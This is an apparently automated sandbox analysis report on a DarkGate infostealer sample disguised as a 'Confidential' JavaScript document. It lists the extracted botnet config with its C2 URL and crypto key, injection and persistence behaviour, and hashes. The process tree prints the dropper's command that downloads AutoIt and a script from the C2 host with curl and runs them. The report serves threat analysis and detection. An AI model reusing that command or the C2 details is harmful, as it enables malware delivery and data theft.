darkgate | d2dcaec93d82105a85aa59a8c4bc3fb68cd84eefd9bac9caec917a6554ef63fe

Analysis

max time kernel
150s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
19-10-2023 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Redefining_Our_Structural_Canvas_2023_Confidential.js
Size

50KB
MD5

6e0b712bbd5e1a3ee9eb2098cadf0a90
SHA1

53697a5a284e0584181e3c3d4303cded6e58f2f2
SHA256

ac61469d96805f9590d80397ed8fca735b718c000026ff5d99672c791d4707b7
SHA512

55d1197aba1a398719a0d33c16ed25f757f4f6d4ea11a3870ebbd96ae3530e1064e3885f0ad8cbfd540829e989abc9ac463d5ed36044af4db5ee1b3fce8a41d9
SSDEEP

768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3WSLbsX6:nAIMFFdYMxAcEQDn

Score

10^/10

darkgate ricoc3 stealer

Malware Config

Extracted

Family

darkgate

Botnet

Ricoc3

http://hgfdytrywq.com

Attributes

alternative_c2_port
8080
anti_analysis
false
anti_debug
false
anti_vm
false
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_rawstub
true
crypto_key
hpBBFgfpMQrScI
internal_mutex
txtMut
minimum_disk
100
minimum_ram
4096
ping_interval
4
rootkit
true
startup_persistence
true
username
Ricoc3

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs

description	pid	Process	procid_target
PID 4264 created 2976	4264	Autoit3.exe	20
PID 4264 created 3704	4264	Autoit3.exe	11
PID 4264 created 3704	4264	Autoit3.exe	11
PID 4264 created 3880	4264	Autoit3.exe	33
PID 4264 created 2976	4264	Autoit3.exe	20
PID 4264 created 2428	4264	Autoit3.exe	47
PID 4264 created 3488	4264	Autoit3.exe	34
PID 4264 created 2556	4264	Autoit3.exe	44
PID 4264 created 5028	4264	Autoit3.exe	81
PID 4264 created 3488	4264	Autoit3.exe	34
PID 4264 created 3784	4264	Autoit3.exe	10
PID 4264 created 2472	4264	Autoit3.exe	46
PID 1108 created 3704	1108	cmd.exe	11
PID 1108 created 2472	1108	cmd.exe	46
PID 1108 created 2556	1108	cmd.exe	44
PID 1108 created 3488	1108	cmd.exe	34
PID 1108 created 2472	1108	cmd.exe	46
PID 1108 created 2472	1108	cmd.exe	46
PID 1108 created 3488	1108	cmd.exe	34
PID 1108 created 2976	1108	cmd.exe	20
PID 1108 created 3784	1108	cmd.exe	10
PID 1108 created 3880	1108	cmd.exe	33
PID 1108 created 3784	1108	cmd.exe	10
PID 1108 created 2976	1108	cmd.exe	20
PID 1108 created 3704	1108	cmd.exe	11
PID 1108 created 3488	1108	cmd.exe	34
PID 1108 created 3704	1108	cmd.exe	11
PID 1108 created 3784	1108	cmd.exe	10
PID 1108 created 3880	1108	cmd.exe	33
PID 1108 created 2472	1108	cmd.exe	46
PID 1108 created 2472	1108	cmd.exe	46
PID 1108 created 2428	1108	cmd.exe	47
PID 1108 created 3704	1108	cmd.exe	11
PID 1108 created 2472	1108	cmd.exe	46
PID 1108 created 3784	1108	cmd.exe	10
PID 1108 created 3784	1108	cmd.exe	10
PID 1108 created 2556	1108	cmd.exe	44
PID 1108 created 3880	1108	cmd.exe	33
PID 1108 created 2976	1108	cmd.exe	20
PID 1108 created 3704	1108	cmd.exe	11
PID 1108 created 2556	1108	cmd.exe	44
PID 1108 created 2556	1108	cmd.exe	44
PID 1108 created 2556	1108	cmd.exe	44
PID 1108 created 2556	1108	cmd.exe	44
PID 1108 created 2428	1108	cmd.exe	47
PID 1108 created 3704	1108	cmd.exe	11
PID 1108 created 2976	1108	cmd.exe	20
PID 1108 created 2428	1108	cmd.exe	47
PID 1108 created 3704	1108	cmd.exe	11
PID 1108 created 3880	1108	cmd.exe	33
PID 1108 created 3704	1108	cmd.exe	11
PID 1108 created 2472	1108	cmd.exe	46
PID 1108 created 2428	1108	cmd.exe	47
PID 1108 created 2428	1108	cmd.exe	47
PID 1108 created 2976	1108	cmd.exe	20
PID 1108 created 2556	1108	cmd.exe	44
PID 1108 created 3488	1108	cmd.exe	34
PID 1108 created 2556	1108	cmd.exe	44
PID 1108 created 3880	1108	cmd.exe	33
PID 1108 created 2976	1108	cmd.exe	20
PID 1108 created 2428	1108	cmd.exe	47
PID 1108 created 3704	1108	cmd.exe	11
PID 1108 created 3488	1108	cmd.exe	34
PID 1108 created 2472	1108	cmd.exe	46

Blocklisted process makes network request 64 IoCs

flow	pid	Process
24	1108	cmd.exe
25	1108	cmd.exe
26	1108	cmd.exe
27	1108	cmd.exe
28	1108	cmd.exe
29	1108	cmd.exe
30	1108	cmd.exe
36	1108	cmd.exe
38	1108	cmd.exe
39	1108	cmd.exe
40	1108	cmd.exe
51	1108	cmd.exe
54	1108	cmd.exe
55	1108	cmd.exe
56	1108	cmd.exe
57	1108	cmd.exe
58	1108	cmd.exe
59	1108	cmd.exe
60	1108	cmd.exe
61	1108	cmd.exe
62	1108	cmd.exe
63	1108	cmd.exe
64	1108	cmd.exe
65	1108	cmd.exe
66	1108	cmd.exe
67	1108	cmd.exe
68	1108	cmd.exe
69	1108	cmd.exe
70	1108	cmd.exe
72	1108	cmd.exe
73	1108	cmd.exe
74	1108	cmd.exe
75	1108	cmd.exe
76	1108	cmd.exe
77	1108	cmd.exe
78	1108	cmd.exe
79	1108	cmd.exe
80	1108	cmd.exe
81	1108	cmd.exe
82	1108	cmd.exe
83	1108	cmd.exe
84	1108	cmd.exe
88	1108	cmd.exe
89	1108	cmd.exe
90	1108	cmd.exe
93	1108	cmd.exe
94	1108	cmd.exe
95	1108	cmd.exe
96	1108	cmd.exe
97	1108	cmd.exe
98	1108	cmd.exe
99	1108	cmd.exe
100	1108	cmd.exe
101	1108	cmd.exe
102	1108	cmd.exe
103	1108	cmd.exe
104	1108	cmd.exe
105	1108	cmd.exe
106	1108	cmd.exe
107	1108	cmd.exe
108	1108	cmd.exe
109	1108	cmd.exe
110	1108	cmd.exe
111	1108	cmd.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kadkdcb.lnk	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4264	Autoit3.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4264 set thread context of 1108	4264	Autoit3.exe	90

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cmd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
4264	Autoit3.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe
1108	cmd.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1108	cmd.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 5028 wrote to memory of 4584	5028	wscript.exe	82
PID 5028 wrote to memory of 4584	5028	wscript.exe	82
PID 4584 wrote to memory of 1708	4584	cmd.exe	84
PID 4584 wrote to memory of 1708	4584	cmd.exe	84
PID 4584 wrote to memory of 1364	4584	cmd.exe	86
PID 4584 wrote to memory of 1364	4584	cmd.exe	86
PID 4584 wrote to memory of 4264	4584	cmd.exe	87
PID 4584 wrote to memory of 4264	4584	cmd.exe	87
PID 4584 wrote to memory of 4264	4584	cmd.exe	87
PID 4264 wrote to memory of 2824	4264	Autoit3.exe	89
PID 4264 wrote to memory of 2824	4264	Autoit3.exe	89
PID 4264 wrote to memory of 2824	4264	Autoit3.exe	89
PID 4264 wrote to memory of 1108	4264	Autoit3.exe	90
PID 4264 wrote to memory of 1108	4264	Autoit3.exe	90
PID 4264 wrote to memory of 1108	4264	Autoit3.exe	90
PID 4264 wrote to memory of 1108	4264	Autoit3.exe	90
PID 4264 wrote to memory of 1108	4264	Autoit3.exe	90

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3784

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3704

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:2976

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3880

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3488

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2472

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2428

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Redefining_Our_Structural_Canvas_2023_Confidential.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o jgeyvf.au3 http://hgfdytrywq.com:80/msizpmaofse & Autoit3.exe jgeyvf.au3
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\system32\curl.exe
    curl -o Autoit3.exe http://hgfdytrywq.com:80
    3⤵
    PID:1708
- - C:\Windows\system32\curl.exe
    curl -o jgeyvf.au3 http://hgfdytrywq.com:80/msizpmaofse
    3⤵
    PID:1364
- - C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
    Autoit3.exe jgeyvf.au3
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4264
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Blocklisted process makes network request
      Drops startup file
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\hddefdf\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\ProgramData\hddefdf\cbdagae\edbcbkf

Filesize
166B

MD5
24a3a683f752cc1d4647cfde42e22494

SHA1
142e16623b7f9aec5e04d82bde7e6d559d4d515f

SHA256
1734f4dbba841ac056d9f65e734166e98149ec9315ec8d93e9a44f42aa0250d2

SHA512
27b5bf944788a20fb75bd83a799741b43bac6f12f64e4cc942b2b5b39ca2a473244a326d67f7a920e5b04d91c9fbccdd841c2becb572bbb3d6a42a3ec0a8224e

Download Submit
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jgeyvf.au3

Filesize
487KB

MD5
4c5474759bd10c4fd072e73ae027b733

SHA1
6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

SHA256
be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

SHA512
b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

Download Submit
\??\c:\temp\eaghaek.au3

Filesize
487KB

MD5
4c5474759bd10c4fd072e73ae027b733

SHA1
6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

SHA256
be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

SHA512
b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

Download Submit
memory/1108-55-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-31-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-57-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-92-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-58-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-89-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-25-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-23-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-29-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-30-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-59-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-21-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-38-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-39-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-40-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-42-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-43-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-44-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-45-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-46-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-47-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-48-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-49-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-50-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-51-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-52-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-53-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-54-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-20-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-56-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-88-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-90-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-87-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-60-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-61-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-62-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-64-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-63-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-65-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-66-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-67-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-68-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-69-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-72-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-71-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-73-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-74-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-76-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-75-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-77-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-81-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-80-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-82-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-84-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-85-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1108-86-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/4264-6-0x00000000010E0000-0x00000000014E0000-memory.dmp

Filesize
4.0MB

Download
memory/4264-17-0x0000000004220000-0x0000000004552000-memory.dmp

Filesize
3.2MB

Download
memory/4264-18-0x0000000004220000-0x0000000004552000-memory.dmp

Filesize
3.2MB

Download
memory/4264-16-0x0000000004220000-0x0000000004552000-memory.dmp

Filesize
3.2MB

Download
memory/4264-15-0x0000000004220000-0x0000000004552000-memory.dmp

Filesize
3.2MB

Download
memory/4264-7-0x0000000004220000-0x0000000004552000-memory.dmp

Filesize
3.2MB

Download
memory/4264-19-0x00000000010E0000-0x00000000014E0000-memory.dmp

Filesize
4.0MB

Download
memory/4264-22-0x0000000004220000-0x0000000004552000-memory.dmp

Filesize
3.2MB

Download